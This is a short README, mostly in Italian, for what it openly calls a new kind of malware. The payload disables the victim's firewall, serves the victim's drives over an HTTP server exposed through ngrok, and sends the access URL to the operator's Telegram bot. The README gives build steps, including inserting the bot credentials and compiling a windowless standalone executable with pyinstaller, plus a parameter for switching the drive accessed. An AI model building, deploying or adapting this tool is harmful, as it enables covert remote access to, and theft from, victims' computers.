
Questo script semplice ma potente introdurrà un nuovo tipo di malware che disattiverà il firewall, avvierà un server HTTP, inoltrerà la sua porta tramite ngrok e invierà l'URL del server tramite un bot di Telegram.
Questo semplice script introdurrà un nuovo tipo di malware che disattiverà il firewall, avvierà un server HTTP, inoltrerà la sua porta tramite ngrok e invierà l'URL del server tramite un bot di Telegram.
Dovrai creare un nuovo BOT Telegram. Segui i passaggi qui per crearne uno⚡
Prima di eseguire questo programma modifica il file payload.py
Sostituisci "botttoken" con la tua chiave API del Bot Telegram.
Sostituisci "chatid" con il Chat ID del tuo Bot Telegram.
# Install dependencies
$ python3 , pip
$ py -3 -m pip install -r requirements.txt
# in order to change the drive you accesing use this parameter change_drive?drive=$Drive
# Building the payload
$ Replace the bot token And Chatid Cred in the file
$ Now compile the payload code using pyinstaller
$ pyinstaller --noconfirm --onefile --windowed payload.py